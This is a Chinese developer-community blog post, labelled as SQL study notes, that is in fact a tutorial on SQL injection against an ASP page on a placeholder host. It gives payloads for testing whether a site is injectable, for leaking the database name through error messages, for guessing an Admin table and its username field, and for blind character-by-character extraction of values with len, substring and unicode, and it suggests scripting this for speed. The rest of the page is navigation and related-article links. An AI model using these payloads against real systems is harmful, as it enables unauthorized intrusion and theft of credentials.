AI 助理
备案控制台
开发者社区 数据库 文章 正文

SQL查询学习记录

2018-09-16 824
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 判断能否进行SQL注入 :① http://www.mytest.com/showdetail.asp?id=49② http://www.mytest.

判断能否进行SQL注入 :

http://www.mytest.com/showdetail.asp?id=49
http://www.mytest.com/showdetail.asp?id=49 ;and 1=1
http://www.mytest.com/showdetail.asp?id=49 ;and 1=2
可以注入
① ② 正常,③ 报错
不可以注入
① 正常,② ③ 报错

数据库名称

http://www.mytest.com/showdetail.asp?id=49 ;and user>0
char和int比较报错为:
将char值 ”abc” 转换数据类型为 int 的列时发生语法错误。
这样就可以通过报错获得数据库名“abc”啦~

猜表名

ID=49 And (Select Count(*) from Admin)>=0
如果页面就与ID=49的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。
表名Admin

猜字段

将Count(*)替换成Count(字段名),用同样的原理猜解字段名
字段名username

猜字段的值(Ascii逐字解码法)

1.测试长度
http://www.mytest.com/showdetail.asp?id=49 ;and (select top 1 len(username) from Admin)>0
其中top语句用来返回要规定记录的数目。
如果top 1的username长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,比如>7成立,>8不成立,就是len(username)=8

2 测试每个字符值
id=49 and (select top 1 unicode(substring(username,1,1)) from Admin)>0
同样也是用逐步缩小范围的方法得到第1位字符的ASCII码,注意的是英文和数字的ASCII码在1-128之间,可以用折半法加速猜解,如果写成程序测试,效率会有极大的提高。

文章标签:
SQL
数据库
测试技术
关键词:
SQL查询
SQL学习
SQL记录
胖佳儿clara
目录
相关文章
蓝染-惣右介
|
3天前
|
SQL 存储 关系型数据库
【MySQL基础篇】全面学习总结SQL语法、DataGrip安装教程
本文详细介绍了MySQL中的SQL语法,包括数据定义(DDL)、数据操作(DML)、数据查询(DQL)和数据控制(DCL)四个主要部分。内容涵盖了创建、修改和删除数据库、表以及表字段的操作,以及通过图形化工具DataGrip进行数据库管理和查询。此外,还讲解了数据的增、删、改、查操作,以及查询语句的条件、聚合函数、分组、排序和分页等知识点。
蓝染-惣右介
13 1
【MySQL基础篇】全面学习总结SQL语法、DataGrip安装教程
蓝易云
|
2天前
|
SQL NoSQL Java
Java使用sql查询mongodb
通过使用 MongoDB Connector for BI 和 JDBC,开发者可以在 Java 中使用 SQL 语法查询 MongoDB 数据库。这种方法对于熟悉 SQL 的团队非常有帮助,能够快速实现对 MongoDB 数据的操作。同时,也需要注意到这种方法的性能和功能限制,根据具体应用场景进行选择和优化。
蓝易云
25 9
蚝油菜花
|
23天前
|
SQL 存储 人工智能
Vanna:开源 AI 检索生成框架,自动生成精确的 SQL 查询
Vanna 是一个开源的 Python RAG(Retrieval-Augmented Generation)框架,能够基于大型语言模型(LLMs)为数据库生成精确的 SQL 查询。Vanna 支持多种 LLMs、向量数据库和 SQL 数据库,提供高准确性查询,同时确保数据库内容安全私密,不外泄。
蚝油菜花
92 7
Vanna:开源 AI 检索生成框架,自动生成精确的 SQL 查询
刘大猫.
|
1月前
|
SQL Java
使用java在未知表字段情况下通过sql查询信息
使用java在未知表字段情况下通过sql查询信息
刘大猫.
37 8
龙大吉
|
1月前
|
SQL 安全 PHP
PHP开发中防止SQL注入的方法,包括使用参数化查询、对用户输入进行过滤和验证、使用安全的框架和库等,旨在帮助开发者有效应对SQL注入这一常见安全威胁,保障应用安全
本文深入探讨了PHP开发中防止SQL注入的方法,包括使用参数化查询、对用户输入进行过滤和验证、使用安全的框架和库等,旨在帮助开发者有效应对SQL注入这一常见安全威胁,保障应用安全。
龙大吉
59 4
蓝易云
|
1月前
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
蓝易云
59 2
云深知何处
|
1月前
|
SQL 监控 关系型数据库
SQL语句当前及历史信息查询-performance schema的使用
本文介绍了如何使用MySQL的Performance Schema来获取SQL语句的当前和历史执行信息。Performance Schema默认在MySQL 8.0中启用,可以通过查询相关表来获取详细的SQL执行信息,包括当前执行的SQL、历史执行记录和统计汇总信息,从而快速定位和解决性能瓶颈。
云深知何处
74 1
sunrr
|
1月前
|
SQL 存储 缓存
如何优化SQL查询性能?
【10月更文挑战第28天】如何优化SQL查询性能?
sunrr
152 10
小Lee
|
1月前
|
SQL 关系型数据库 MySQL
查询INFORMATION_SCHEMA.PROCESSLIST和INFORMATION_SCHEMA.INNODB_TRX的sql语句
【11月更文挑战第2天】
小Lee
56 2
1689161901914944
|
2月前
|
SQL 数据库 开发者
功能发布-自定义SQL查询
本期主要为大家介绍ClkLog九月上线的新功能-自定义SQL查询。
1689161901914944
41 6

热门文章

最新文章

  • 1
    Flask 框架防止 SQL 注入攻击的方法
  • 2
    Vanna:开源 AI 检索生成框架,自动生成精确的 SQL 查询
  • 3
    SQL自学笔记(3):SQL里的DCL,DQL都代表什么?
  • 4
    Flink SQL Deduplication 去重以及如何获取最新状态操作
  • 5
    MySQL导入.sql文件后数据库乱码问题
  • 6
    MySQL进阶突击系列(02)一条更新SQL执行过程 | 讲透undoLog、redoLog、binLog日志三宝
  • 7
    MySQL 高级(进阶) SQL 语句
  • 8
    MySQL进阶突击系列(01)一条简单SQL搞懂MySQL架构原理 | 含实用命令参数集
  • 9
    SQL自学笔记(1):什么是SQL?有什么用?
  • 10
    SQL慢查询优化策略
  • 1
    Java使用sql查询mongodb
    25
  • 2
    【MySQL基础篇】全面学习总结SQL语法、DataGrip安装教程
    13
  • 3
    日志服务 SQL 引擎全新升级
    21
  • 4
    使用访问指导(SQL Access Advisor)优化数据库业务负载
    31
  • 5
    Flink SQL Deduplication 去重以及如何获取最新状态操作
    77
  • 6
    这可能是最适合解决 SQL 数据分析痛点的编程语言
    44
  • 7
    南大通用GBase 8a MPP Cluster Linux端SQL进程监控工具
    34
  • 8
    使用Python和PDFPlumber进行简历筛选:以SQL技能为例
    37
  • 9
    MySQL 高级(进阶) SQL 语句
    60
  • 10
    MySQL进阶突击系列(02)一条更新SQL执行过程 | 讲透undoLog、redoLog、binLog日志三宝
    68

    • 相关课程

    更多
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • 数据库及SQL/MySQL基础
  • SQL进阶及查询

    • 相关电子书

    更多
  • SQL Server在电子商务中的应用与实践
  • GeoMesa on Spark SQL
  • 原生SQL on Hadoop引擎- Apache HAWQ 2.x最新技术解密malili

    • 相关实验场景

    更多
  • MySQL基础-学生管理系统数据库设计
  • PolarDB for AI:在数据库中通过SQL实现AI能力
  • 玩转MaxCompute SQL! 30分钟搞定数据分析挖掘
  • 使用SQL语句实现数据插入、修改和删除操作
  • 使用SQL语句实现数据查询操作
  • 使用SQL语句管理索引
    • 下一篇
    手把手教你白嫖阿里云服务器(免费领服务器)